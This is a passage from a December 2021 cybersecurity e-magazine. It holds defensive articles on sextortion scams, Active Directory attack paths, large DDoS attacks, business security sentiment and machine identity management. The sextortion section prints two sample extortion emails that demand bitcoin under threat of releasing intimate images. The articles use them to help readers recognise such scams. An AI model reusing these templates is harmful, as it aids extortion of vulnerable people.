7. Don't give up personal in<strong>for</strong>mation<br />
8. Contact and report to law en<strong>for</strong>cement if images have been posted without consent or fear <strong>for</strong> selfsafety.<br />
What if I'm already paying money?<br />
If you've already paid the scammer, contact your bank immediately to request a chargeback. If they have<br />
access to any of your accounts, including Facebook, YouTube or WhatsApp, make sure to change all<br />
associated passwords as soon as possible. Also, be aware that if these scammers are using an email<br />
address <strong>for</strong> their official communication with you, it's possible they also got to other online accounts you<br />
use.<br />
If I've already paid money, is there anything else that can be done?<br />
Seeking help from the relevant authorities is the best thing you can do if this has happened to you. They<br />
will be able to find out where your images are being held and work with law en<strong>for</strong>cement in those countries<br />
to get them removed. Contacting an online security professional is also a good idea if you're not familiar<br />
with this sort of thing and need help keeping your private data secure in the future.<br />
Sextortion email examples<br />
There are many examples of sextortion email scams floating around the internet. We have shared a few<br />
of them below.<br />
Example 1: Threatening email asking <strong>for</strong> bitcoin<br />
Dear (insert victim's name here),<br />
You don't know me, but I've been watching you. I hacked into your computer and took some very personal<br />
pictures of you that I now have as leverage against you. You can view them on this site: (site with<br />
compromised images). If you would like to get the photos back, send $500 to Bitcoin wallets address:<br />
(insert bitcoin address here)<br />
You have 24 hours. If I don't get my money, these pictures will be released <strong>for</strong> everyone on the internet<br />
to see, and you'll never be able to scrub them from existence. You can keep it anonymous if you wantthat<br />
should still scare you.<br />
-Scammer<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 128<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Example 2:'You've been hacked' email asking <strong>for</strong> money<br />
Dear (insert victim's name here),<br />
I know who you are and what you've been doing on your computer. I had recorded videos of everything<br />
- mainly the videos that show up when you were visiting adult websites, as well as other things like<br />
webcam footage from Skype sessions with family members or colleagues.<br />
You should read this article: (insert a link to article)<br />
If you don't take action and pay ransom immediately, I will release these videos and photos of you on the<br />
internet so that your family and friends get a good laugh.<br />
I'll be in touch soon!<br />
-Scammer<br />
About the Author<br />
Harman is a director at Cyphere where he advises businesses on how<br />
to protect from cybersecurity threats to businesses. It involves<br />
per<strong>for</strong>ming hacking simulations in real-time to explain technical<br />
concepts just like you would to your grandparents.<br />
Harman can be reached online at<br />
https://twitter.com/thecyphere<br />
https://www.linkedin.com/in/harman12/<br />
https://thecyphere.com/company/enquiries/<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 129<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Getting Started with Active Directory Security<br />
Evaluating, Benchmarking and Creating a Strategy<br />
By Justin Kohler, Director of BloodHound Enterprise, SpecterOps<br />
Over 90% of the Fortune 1000 use Microsoft Active Directory (AD) <strong>for</strong> identity and access management.<br />
This ubiquity makes AD a prime target <strong>for</strong> attackers because compromising it almost always gives them<br />
the access they need to achieve their goals. Additionally, attackers can compromise AD easily by<br />
manipulating common errors in user identity and privilege.<br />
Consider this scenario: An attacker gets an employee’s credentials through a phishing attack. That user<br />
is a member of the “Help Desk” security group in AD with a low level of privilege. But the Help Desk group<br />
has been nested inside another group that has privileges over a PCI server. Our hypothetical employee<br />
is not supposed to have control over that server, but the group nesting has given them privilege over it<br />
accidentally. That server also has a service account logged in, and it’s simple <strong>for</strong> an attacker to steal<br />
those credentials now that they have control over the server. That service account happens to have the<br />
“Add Member” privilege to the Domain Administrators group, so now the attackers can make themselves<br />
a domain admin. This chain of steps that allows an adversary to escalate privilege and move laterally<br />
through Active Directory is an example of an Identify Attack Path (referred to as “Attack Path” <strong>for</strong> the rest<br />
of this article). Multiple Attack Paths just like this exist in nearly every environment my colleagues and I<br />
examine.<br />
Improving AD security to prevent these attacks requires IT Operations, Security Operations, and Identity<br />
and Access Management (IAM) teams to work together since each owns a portion of securing AD. A<br />
successful strategy must 1) be understandable and defensible to management, 2) give practical solutions<br />
that can realistically be implemented by AD administrators, 3) be measurable so that the organization<br />
can track progress over time, and 4) cannot require changes that greatly interfere with normal business<br />
operations.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 130<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
How can this strategy be implemented? Let’s look at a practical, actionable approach to securing AD<br />
security with these four steps:<br />
Step One: Define High-Value Assets<br />
First, think like an adversary and focus on what they’ll focus on. Define the high-value assets in Active<br />
Directory that most attackers will target. A great place to start is the objects in Active Directory that enable<br />
full control over the domain. Commonly referred to as “Tier Zero” or “Control Plane” in Microsoft’s new<br />
Enterprise Access Model, these include the Domain, Enterprise, and Schema Admins, and Domain<br />
Controllers groups, plus the domain head object, and applicable group policies. Adversaries want to get<br />
privilege on these assets because they enable additional access required to accomplish their objectives.<br />
IT may also consider including other critical systems that would have a significant payoff <strong>for</strong> attackers,<br />
such as privileged access management (PAM) solutions.<br />
Step Two: Map Attack Paths<br />
Next, map out all of the ways an adversary could compromise those high-value assets. Un<strong>for</strong>tunately,<br />
AD’s interface and built-in tooling do not provide the necessary visibility to audit privilege effectively. This<br />
lack of visibility makes it very difficult to see users’ privileges, which groups they are members of, etc.,<br />
which causes Attack Paths to build up over time. Surfacing these paths will require specialized tools like<br />
BloodHound (an open-source Attack Path mapping tool), which gives visibility into AD to map out how<br />
attackers can use misconfigurations to control high-value assets.<br />
Step Three: Start with Critical Paths<br />
An enterprise AD environment can easily have tens of thousands of potential Attack Paths. For an AD<br />
security plan to be practical, it must prioritize which ones to fix first. Without the ability to measure the<br />
exact risk of each path in your environment, two manageable areas present a significant risk to any<br />
environment. 1) attack paths from large groups in the environment to critical assets and 2) Kerberoastable<br />
critical assets. Here is a full explanation of how to find and fix these specific issues.<br />
These two areas represent a significant risk because each may be executed by effectively any member<br />
of the organization through the use or abuse of AD configurations. Another area the security or IAM team<br />
may consider reviewing is any permissions granted to the large default groups such as Domain Users,<br />
Authenticated Users, or Everyone. These permissions can create large beachheads <strong>for</strong> attackers to move<br />
laterally within the environment, even if they don’t grant full access through a critical asset.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 131<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Step Four: Develop Actionable Remediations<br />
The final piece of the puzzle is to create clear remediation guidance that all teams can understand. AD<br />
administrators or IAM team members will likely implement any changes to AD. They have different<br />
priorities than the security team, and they’re under extreme pressure to maintain the backbone of the<br />
enterprise. There<strong>for</strong>e, they need to consider how any changes to AD will affect the user's ability to do<br />
their jobs.<br />
That means any remediation recommendations need to clearly explain what the AD admins should do,<br />
the side effects of the change, and how the fix will affect overall risk exposure. This lets AD admins,<br />
executives, and management make in<strong>for</strong>med decisions about executing the change. For example,<br />
remediation could break legacy application functionality. As a result, the change may need to be logged<br />
<strong>for</strong> a substantial amount of time be<strong>for</strong>e the organization feels confident that it won’t cripple a critical<br />
business function.<br />
Active Directory has existed <strong>for</strong> over 20 years. Un<strong>for</strong>tunately, 20 years without visibility into how privileges<br />
are applied leads to seemingly insurmountable challenges. To make real progress, teams must use other<br />
methods to evaluate their AD environment, measure risk, and give practical, actionable guidance <strong>for</strong><br />
fixing problems. Any plan that can account <strong>for</strong> all these elements will be a massive step towards a more<br />
secure AD environment <strong>for</strong> everyone.<br />
About the Author<br />
Justin Kohler is the director <strong>for</strong> the BloodHound Enterprise<br />
product line at security consulting company SpecterOps.<br />
He is an operations expert who has over a decade of<br />
experience in project and program development. After<br />
beginning his career in the US Air Force, he worked <strong>for</strong><br />
several consulting firms focused on process and workflow<br />
optimization and held positions at Microsoft and Gigamon.<br />
He enjoys building and leading teams focused on customer<br />
delivery at Fortune 500 companies.<br />
Justin can be reached online at @JustinKohler10 and at our company website https://specterops.io/<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 132<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Surviving The New Era of Terabit-Class DDoS Attacks<br />
By Richard Hummel, Threat Intelligence Lead, NETSCOUTy<br />
In March 2018, a massive Distributed Denial of Service (DDoS) disrupted service <strong>for</strong> the developer<br />
plat<strong>for</strong>m GitHub. The attack, which lasted <strong>for</strong> approximately 20 minutes, was the largest on record.<br />
It was also a milestone. At roughly 1.2 terabits <strong>for</strong> second, it <strong>for</strong>mally inaugurated the era of terabit-class<br />
attacks, roughly the equivalent of 25 or 30 high definition movies every second. It was followed one week<br />
later by another attack, a 1.7 Tbps assault at a U.S.-based service provider.<br />
DDoS attacks flood targeted networks with requests <strong>for</strong> traffic that overwhelm the system and cause<br />
outages. Attackers had been, <strong>for</strong> years, setting new records in the volume of traffic they could send. Still,<br />
in the years leading up to the attack, there were some that debated whether an attack of that size was<br />
even feasible given certain technical limitations.<br />
Now, just three years later, terabit-class attacks occur nearly every month. Recently, a major international<br />
enterprise software provider said that it had mitigated a 2.4 Tbps attack.<br />
The good news is that organizations with up-to-date DDoS defenses and sufficient mitigation capacity<br />
can maintain availability in the face of these extremely large attacks. But, that doesn’t mean enterprises<br />
can ignore the risk of massive DDoS attacks. <strong>Cyber</strong>criminals continue to innovate in this field by<br />
combining volumetric DDoS attacks with other threats, such as ransomware; or by deploying multi-vector<br />
attacks that drastically increase complexity <strong>for</strong> defenders.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 133<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
The New Normal<br />
Several factors have converged to drive terabit-class attacks. Attackers continue to build massive<br />
botnets, the armies of infected devices that can direct malicious traffic at targeted systems. Meanwhile,<br />
IoT devices, which too often have lax cybersecurity standards, have only increased the number of devices<br />
available to compromise.<br />
A second factor is the continued development of reflection amplification attacks. Think of it this way: in<br />
most DDoS attacks, a targeted system is flooded with requests <strong>for</strong> in<strong>for</strong>mation that initiate a response. In<br />
a reflection attack, attackers disguise the origin of the attack traffic to make it appear that it is coming<br />
from the targeted network or device. In other words, the attack tricks the targeted system into sending<br />
the response back to itself. But the size of the request <strong>for</strong> in<strong>for</strong>mation and the response are not always<br />
symmetrical. For some internet-based services, a request <strong>for</strong> in<strong>for</strong>mation initiates a response that is far<br />
larger in proportion. By targeting these services, attackers can significantly amplify the size of their attack.<br />
A reflection amplification attack both magnifies the amount of malicious traffic an attacker can generate,<br />
and obscures its source. In the first half of <strong>2021</strong> alone, threat actors weaponized at least seven new<br />
reflection and amplification vectors. The deployment of this new tactic ignited an explosion of new attack<br />
modes. Along those lines, the number of vectors used in multivector DDoS attacks has soared, with a<br />
record-setting 31 attack vectors deployed in a single attack against one German organization.<br />
That’s the type of attack launched against GitHub. Known as a memcached attack. Open source and<br />
free, Memcached is a high-per<strong>for</strong>mance, distributed memory caching system designed to optimize<br />
dynamic web applications. The amplification capabilities of Memcached servers is so great that if you<br />
send a single request, that request could send back more than 50,000 responses.<br />
Mixing Tactics, Vectors, and Targets<br />
Large attacks are relatively easy to identify by automated defenses. But that has value in itself to<br />
attackers. A large DDoS campaign may, <strong>for</strong> example, provide cover <strong>for</strong> another attack, and threat actors<br />
can adapt their tactics to overcome defenses when volume alone does not suffice (though, to be clear, a<br />
big attack still causes many problems).<br />
An emerging trend has been the development of adaptive attack techniques designed to evade traditional<br />
defenses. These types of attacks require extensive pre-attack research and reconnaissance to identify<br />
vulnerabilities. The result, however, is an attack perfectly calibrated to overcome an organization’s<br />
defenses. Furthermore, attackers don’t always need to attack an organization itself to cause damage. In<br />
many cases, DDoS attacks can target service providers, including DNS servers, VPN concentrators to<br />
inflict collateral damage.<br />
Defending Against Terabit-Class Attacks<br />
Overall, the first half of <strong>2021</strong> saw a staggering 11 million DDoS attacks. It’s not a matter of if a company<br />
will find themselves in the crosshairs of a DDoS attack, it’s a matter of when. The pandemic, and its<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 134<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
accompanying shift toward more digital services <strong>for</strong> consumers and businesses, has expanded the threat<br />
surface. Businesses are more reliant on digital services to reach their customers than ever be<strong>for</strong>e, driving<br />
an even greater need <strong>for</strong> adequate defenses.<br />
The first step in protecting an organization is taking a good, hard look in the mirror. The shifting dynamics<br />
of the workplace brought massive changes. Businesses should conduct frequent evaluations to stay<br />
ahead of new threats, and assessments of whether DDoS mitigation capacity continues to be adequate.<br />
Companies should also have conversations with their third-party suppliers on which they rely <strong>for</strong><br />
connectivity, including ISPs and VPN concentrators to ensure they have adequate mitigation capacity.<br />
Running next-generation security tools that leverage packet data can provide insights into possible<br />
incursions and changes to networks and infrastructure, offering early alerts to security and network<br />
operations teams.<br />
Despite being one of the oldest known <strong>for</strong>ms of cyber attack, DDoS remains a pervasive threat. Terabitclass<br />
attacks are un<strong>for</strong>tunately inching closer to the mainstream, but even worse, they are just one tool<br />
in the attackers’ arsenal as they continue to innovate new vectors and attack methods. Hence it is more<br />
imperative than ever be<strong>for</strong>e that defenders and security professionals remain vigilant to protect the critical<br />
infrastructure that connects and enables the modern world.<br />
About the Author<br />
Richard Hummel has over a dozen years of experience in the<br />
intelligence field and is currently the Threat Intelligence Research Lead<br />
<strong>for</strong> NETSCOUT's ASERT Research Team. Previously, he served as<br />
Manager and Principal Analyst on the FireEye iSIGHT Intelligence’s<br />
Financial Gain team. He began his career as a Signals Intelligence<br />
Analyst with the United States Army. During the course of his service<br />
he became certified in Digital Network Intelligence and supported<br />
multiple operations overseas including a deployment to Iraq.<br />
After departing from the Army as an enlisted soldier, he began<br />
contracting work as a Computer Network Operations analyst in support<br />
of the Army. During his tenure as a contractor, he developed many<br />
methods and procedures <strong>for</strong> conducting <strong>Cyber</strong> Discovery and trained<br />
analysts at Army INSCOM HQ's. At FireEye iSIGHT Intelligence, he led a team of technical analysts in<br />
the tracking, reporting, and analysis of various cyber crime related malware families.<br />
Richard can be reached online at www.netscout.com<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 135<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> (In)Secure: Business Sentiment on <strong>Cyber</strong> Security<br />
Challenges<br />
By James Edgar, Senior Vice President and Chief In<strong>for</strong>mation Security Officer, FLEETCOR<br />
Undoubtedly the last two years have been incredibly challenging <strong>for</strong> businesses, as many companies<br />
grappled with the health and safety of employees, massive revenue loss, threats of closure and the great<br />
resignation. To make matters worse, as businesses set their sights on recovery, cybercriminals focused<br />
on taking advantage of any vulnerabilities available.<br />
According to the FBI’s Internet Crime Report, the Internet Crime Complaint Center (IC3) saw a 69%<br />
increase in total complaints from 2019 to 2020. Business E-mail compromise, phishing and ransomware<br />
all are on the rise.<br />
Yet, despite an uptick in cyberattacks since the pandemic began, global corporate payments provider<br />
FLEETCOR surveyed business owners and learned 91% say they have not fallen victim to a cyberattack<br />
in the last 12 months.<br />
According to FLEETCOR’s <strong>2021</strong> Insights on Business <strong>Cyber</strong>security Study, <strong>for</strong> small companies with 20<br />
or fewer employees, the number dips even lower with just 7% of survey respondents saying they fell<br />
victim to a cyberattack during the same timeframe. For businesses with 21-50 employees, that number<br />
doubles to 14%.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 136<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Survey results show businesses are becoming increasingly aware and diligent in their security practices,<br />
especially as the pandemic reshapes work environments, including increased cloud adoption and<br />
companies welcoming hybrid work scenarios. However, the threat of a cyberattack still looms.<br />
Business disruption is the most prevalent concern<br />
Nearly two-thirds (62%) of FLEETCOR survey respondents report concerns their business is at risk of<br />
becoming cyberattack prey, while 83% strongly agree cybersecurity breaches are damaging to business.<br />
Not surprisingly, when asked to select the most concerning cyberattack consequence, 65% of<br />
respondents chose loss of profitability and/or disruption to operations. And it’s no wonder since, in 2020,<br />
the average cost of a data breach was $3.86 million, according to the Cost of a Data Breach Report by<br />
Ponemon Institute.<br />
Little spent on cybersecurity protection<br />
Despite the high level of apprehension <strong>for</strong> being at risk of a cyberattack, few businesses surveyed by<br />
FLEETCOR put their money where their concern is. Fifty-seven percent of respondents said they allocate<br />
5% or less of their annual IT budget to cybersecurity protection, while 25% allot 6%-10% of their IT<br />
budgets to this cause. Although they’d like to spend more on cybersecurity protection, lack of capital<br />
resources is the primary reason businesses don’t.<br />
Digital payments here to stay<br />
As many businesses at the onset of the pandemic temporarily closed physical locations, digital payments<br />
soared, and this shows no signs of slowing. More than half of American business owners (53%) surveyed<br />
said the global crisis increased their adoption with apps being the most executed method. It’s no wonder<br />
since they’re easy to use, safe and can be used around the clock.<br />
And while secure digital practices should be table stakes <strong>for</strong> companies conducting business with other<br />
companies, most respondents – four out of 10 – don’t know about their vendors’ cybersecurity policies<br />
and practices. More than 20% rely on word of mouth and said they had no knowledge regarding this<br />
matter at all.<br />
This practice of not knowing is risky. When vendors lack strong security controls, your company is<br />
exposed to a myriad of risks – financial operational, regulatory and reputational, to name a few.<br />
Don’t risk it<br />
Going into the new year, evaluate your company and vendor security practices and identify areas you<br />
might be falling short. Consult with your fellow business leaders and put a plan in place to mitigate risk.<br />
The last two years have proven life is unpredictable, but the more you understand your business risk<br />
realities, the better equipped you will be to handle security challenges.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 137<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
About the Author<br />
James Edgar, Senior Vice President and Chief In<strong>for</strong>mation<br />
Security Officer, FLEETCOR<br />
James Edgar is currently SVP & CISO <strong>for</strong> FLEETCOR<br />
Technologies, a global leader in fuel, lodging, tolls and<br />
commercial payment solutions. He oversees the global<br />
In<strong>for</strong>mation Security and IT Compliance teams, which span four<br />
continents and multiple business lines. Be<strong>for</strong>e joining<br />
FLEETCOR, James was the VP of Security Architecture, Risk and<br />
Assurance <strong>for</strong> U.S. Bank's payment processing division, Elavon.<br />
Prior to joining U.S. Bank, James led the Security Architecture<br />
and Risk team <strong>for</strong> Cox Communications, the 3rd largest cable<br />
operator in the nation. James has served on the Steering<br />
Committee <strong>for</strong> the Payment Processors In<strong>for</strong>mation Sharing Council (PP-ISC), participated in the NIST<br />
<strong>Cyber</strong>security Framework (CSF) development workshops and has been actively involved in the<br />
governance, risk and compliance (GRC) community in Atlanta.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 138<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Enterprises Cannot Achieve Zero Trust Security Without<br />
Machine Identity Management<br />
Thanks to the rise of machines and shift towards zero trust security, organizations’ security will require<br />
a new type of identity management<br />
By Murali Palanisamy, chief solutions officer, AppViewX<br />
The enterprise IT landscape is experiencing phenomenal disruption. While digital trans<strong>for</strong>mation, cloud<br />
migration, and the remote work model have opened a world of possibilities <strong>for</strong> organizations, these<br />
sweeping changes permanently reset the cybersecurity game's rules. The attack surface is expanding<br />
and trying to respond to these changes with increased frequency and sophistication.<br />
Organizations are increasingly looking at alternative approaches <strong>for</strong> securing a growing, cloud-driven,<br />
distributed environment. The surge of digital technologies has led to massive growth in the number of<br />
machines or digital assets, opening a vast attack surface. Securing these distributed assets and their<br />
communication is critical <strong>for</strong> data security. However, with network perimeter fast disappearing, digital<br />
security has become a significant challenge <strong>for</strong> organizations. Amid all these changes, a new one:<br />
managing the identities of machines has emerged as a top priority. In fact, Gartner has named machine<br />
identity management an essential element in securing today’s enterprises.<br />
This recognition and shift towards zero trust security has led to security leaders recognizing the<br />
importance of machine identity management, but how to properly approach it is one of the biggest<br />
challenges.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 139<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Building digital trust<br />
With identity becoming the new network perimeter, verifying digital identities on a network is integral to a<br />
zero-trust strategy. But limiting verification to user identities is not sufficient. Proper zero trust<br />
implementation is heavily dependent upon digital certificates and key pairs. The objective is to strengthen<br />
security and ensure device verification along with identity verification.<br />
Adopting the zero trust model starts with segmentation, implementing privilege access management<br />
(PAM), multi-factor authentication (MFA), vulnerability and patch management, and security analytics.<br />
However, companies miss out on one crucial area, and that includes managing machine identities. This<br />
opens risks rising from compromised encryption tunnels.<br />
Manually managing certificate lifecycles whether it’s through spreadsheets – or paper documents – is<br />
time-consuming, error-prone, and highly inefficient. With hundreds of thousands of certificates in<br />
circulation, administrators cannot rely on manual management techniques to ensure that public key<br />
infrastructure (PKI) is constantly secure and up to date. There is a pressing need <strong>for</strong> a management<br />
system that includes alerting processes and automated workflows <strong>for</strong> PKI tasks such as certificate<br />
renewal, requisition, revocation, deployment, and more.<br />
Recognizing the power of automation<br />
While digital certificates contribute much to a zero-trust architecture, organizations need a managed<br />
solution with the capabilities to automate the certificate lifecycle. Implementing an end-to-end certificate<br />
lifecycle automation solution is a key initiative towards achieving a fully functional zero trust model.<br />
Automation tools simplify certificate operations by allowing administrators to carry out all necessary<br />
activities from a single interface (i.e., without using each certificate authority’s interface to renew or revoke<br />
the certificates they have issued). Last, automation helps enable cryptographic agility. For example,<br />
digital identities can stay on top of protocol and algorithm upgrades to offer the best possible protection<br />
under all circumstances.<br />
Embracing PKI to secure networks<br />
It’s no longer enough to simply set up the necessary SSL certificates on websites and servers and renew<br />
them once every few years. PKI protects nearly every internet-facing system (and its back-end servers),<br />
software programs (in the <strong>for</strong>m of code-signing certificates), and communication in general. There have<br />
been well-documented occurrences of PKI being the weak link that resulted in data breach, such as the<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 140<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
Capital One breach back in 2019. Additional emerging trends that have underscored the need <strong>for</strong><br />
organizations to embrace PKI include:<br />
• Cloud Applications: With the emergence of cloud-based apps, multicloud deployment, and<br />
container-based deployment, the need to secure the hosting infrastructure and individual<br />
consumer endpoints has become paramount.<br />
• Internet of Things (IoT): Not only are IoT deployments numerous in terms of individually<br />
connected endpoints, but several applications of IoT also hold sensitive data that should be<br />
protected at all by PKI, as the vanguard.<br />
• DevOps: PKI and DevOps have never been compatible – DevOps exemplifies agility, while PKI<br />
has traditionally been a slow, manual exercise. However, certificates need to be rapidly deployed<br />
to protect outgoing code, applications, and communication lines in general.<br />
• Remote Work: As an entirely remote work<strong>for</strong>ce slowly becomes the norm, the existence of valid,<br />
constantly updated PKI on organizational systems not only makes remote access secure it also<br />
ensures that employees' digital assets remain secure by enabling constant updates via air.<br />
•<br />
Infusing AI and ML in Identity Management to thrive in a current and post-pandemic world<br />
In recent years, artificial intelligence (AI) and machine learning (ML) have been quietly trans<strong>for</strong>ming<br />
industries. With cyberattacks becoming more sophisticated and the continued rise in ransomware<br />
demands, new tools with advanced AI and ML capabilities are needed.<br />
Machine learning leverages algorithms to analyze large quantities of data to uncover patterns that enable<br />
accurate predictions. According to Gartner, IAM is "the security discipline that enables the right individuals<br />
to access the right resources at the right times <strong>for</strong> the right reasons.”<br />
Adding ML capabilities to IAM solutions helps authenticate the user and whether they should be granted<br />
access to specific applications/data. In other words, it helps validate if these are the right resources <strong>for</strong> a<br />
particular user.<br />
AI is instrumental in the future of IAM since it recognizes patterns and expands knowledge exponentially<br />
at the same rate as risk. Continuous authentication ensures that <strong>for</strong> every interaction, the context of a<br />
user is constantly evaluated. Organizations can detect potential threats easily as AI analyzes interactions<br />
while considering time, place, and even user movement. All these analytics help calculate the level of<br />
potential risk at every point.<br />
AI-based tools based on machine learning ease off the authentication burden on users and infuse<br />
enhanced security fueled by robust identity management and access controls.<br />
Organizations need to embrace a holistic cybersecurity strategy that is <strong>for</strong>ward-looking, will reduce<br />
access and compliance costs, help them stay agile and flexible while accelerating their journey to the<br />
cloud.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 141<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
About the Author<br />
Murali Palanisamy, chief solutions officer, AppViewX, is<br />
responsible <strong>for</strong> overall product vision, development and<br />
technical direction of AppViewX. Prior to AppViewX, he was<br />
a Senior Vice President at Bank of America, where he was<br />
leading the e-commerce application delivery’s architecture<br />
and engineering team. He also served as VP of Architecture<br />
and Product Engineering <strong>for</strong> Merrill Lynch, where he<br />
designed and developed automation and integration solutions<br />
<strong>for</strong> servers, application delivery controllers, IP services and<br />
networking. Murali can be reached through his LinkedIn and through AppViewX:<br />
https://www.appviewx.com/talk-to-an-expert/.<br />
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 142<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 143<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 144<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 145<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 146<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 147<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 148<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 149<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 150<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 151<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 152<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 153<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 154<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 155<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
<strong>Cyber</strong> <strong>Defense</strong> <strong>eMagazine</strong> – <strong>December</strong> <strong>2021</strong> <strong>Edition</strong> 156<br />
Copyright © <strong>2021</strong>, <strong>Cyber</strong> <strong>Defense</strong> Magazine. All rights reserved worldwide.
